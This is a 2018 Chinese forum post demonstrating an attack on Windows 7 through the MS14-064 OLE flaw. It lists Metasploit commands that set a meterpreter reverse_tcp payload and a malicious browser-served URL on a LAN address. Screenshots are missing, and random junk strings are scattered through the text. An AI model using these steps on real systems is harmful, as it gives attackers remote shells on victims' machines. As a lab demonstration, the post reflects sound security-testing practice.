找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1259|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ L( ^ Q7 l2 a2 k& u 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 \+ M T- B+ i2 J& ?6 l& Q3 h

/ B% R/ X5 h6 q* b K

' o, L" R; o/ L! s0 \ o0 Y+ D4 p 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + E; _' j7 [2 V. `- T- l

, o+ |6 C1 M% T/ P1 N% T% w4 v

) E8 J: Y; m& C0 g: C 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp' F+ c* X1 F0 B+ Z1 {

# X* K/ n: L4 L! q, M

3 J! |/ M/ v; J: X+ R             set AllowPowershellPrompt true( W% V9 t# _, h: s

! z+ q7 W6 J; Y3 D) I

" C* z8 j3 |9 n$ T5 V5 N/ z             Set LHOST 192.168.0.109& u4 p0 `1 b# o3 V

" R" u: m& z, F1 Z5 h& G1 z

+ [7 g( U/ ^2 P, K/ s+ _% s# D U             set SRVHOST 192.168.0.109& ?0 D1 a, Z# j- d5 a( m3 d& {

0 v: y/ m4 p( p3 Q

* r" D) s3 G6 ?8 C& H: D             Set uripath share- e M) k5 i$ M; \

s+ d" a+ P4 |9 X6 C, }* C

6 K! o' V/ L ?- t             Set srvport 80 ' p0 h9 b8 X* a

- E3 y( D& @$ v2 K* b

4 ^ u' d4 c! @% [( M. L  , i5 u0 s" z* J! M9 A

5 j8 O0 C+ k* g7 x

8 J4 l9 c$ s" h7 u6 X: K1 D8 C+ s   3 q/ B: U5 [( L: e

! N& r3 B0 X0 M; |7 e# r4 _5 M

# {/ ?, v" `0 E1 m- Z   + G, ^* _* P- S7 u, {

/ }; e! Y' i$ a' o3 ~) C

% r' z0 ~6 g6 T' Z: b, y  : A! r/ [) m8 }7 _

7 Y+ O; ]: U+ T2 Y

9 E/ h. z9 n' k$ C! ]2 _   5 ?) o; Y/ T, ^- w

2 Y. g0 W* n) I/ p

0 C$ Q! Y7 r" I4 T+ Z 下面我们来访问本地地址如图:- s$ F0 M. L0 E$ p# l$ ^+ u- U

$ V* L i8 r7 ~) m

2 H5 F+ }- q% K3 q7 E4 i  ! h m' u) P2 k

* J4 H+ h Q) R5 y! E0 [ M

+ `6 x3 @* k0 f) n6 e1 a   5 u* m# A8 s" Y i

x) h$ E1 }' l. E; I

h& j4 S' P* c : t. H' @( K1 k9 a: s! t

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表